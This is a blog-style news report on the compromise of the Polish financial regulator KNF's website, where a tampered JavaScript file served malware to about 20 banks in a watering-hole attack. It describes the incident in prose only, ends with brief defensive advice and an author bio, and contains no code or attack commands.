The Banks are investigating what is being considered as the largest system hack in the country’s history after malware was discovered on various workstations in the Polish banking industry. The malware infection ironically has resulted from the compromised servers at the Polish financial regulator, KNF itself. The KNF decided to take down its entire system after the discovery of suspicious downloads infecting various banking systems. The regulator has confirmed that their internal systems have been compromised by some foreign hackers.

The complete scenario As per the sources, an unidentified hacker compromised the KNF website for well over a week; modifying one of the JavaScript files of the regulator’s site causing the visitors to load malicious JavaScript file which after that downloaded malicious payloads. Once executed, the malware would connect to remote servers to perform hazardous activities such as data exfiltration and post exploitation. In other cases, the attackers even managed to access the critical servers within the targeted bank’s infrastructure.

At least 20 banks have found their system affected by the causality. Upon the initial infection stages, the antivirus solutions were incapable of detecting the malware. The attack didn’t compromise with the savings of the customers. However, it was a different scenario with information theft with several organisations reporting encrypted transfers of their data to unfamiliar servers. These cases would eventually take the losses much beyond its borders.

While the regulator KNF and financial institutions are looking into the matter, the Polish bank association is keen in reassuring the customers that their money is safe with the banks and that the Polish banking industry operates generally. This so-called water hole technique of hacking is much more sophisticated than the previous Lazarus attacks, pointing out at the innovation hackers are putting into gaining malicious access to critical sites.

It is important to understand that as the banking systems around the world share common Access points, the standard protocols are not enough to prevent advanced cyber-attacks. Due to the modern browsing environment and lack of defence enables the tampering of JavaScript and APIs. Therefore, the enhanced API’s along with sound infrastructure networking policies working in parallel could play a significant role in preventing such breaches in future. This broad-ranging cyber hack will most probably go down as the worst cyber-attack on the Polish bank industry with almost 20 banks already confirmed positive for being the malware victims while others still under investigation.

About The Author

"As a child, I was always looking at cyber security news because it interested me immensely. Growing up, I developed a habit of surrounding myself with other like-minded people and this helped shape me as a cyber security enthusiast. By constantly indulging in cyber security related forums, my love for the topic has snowballed."

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

20 + 7 =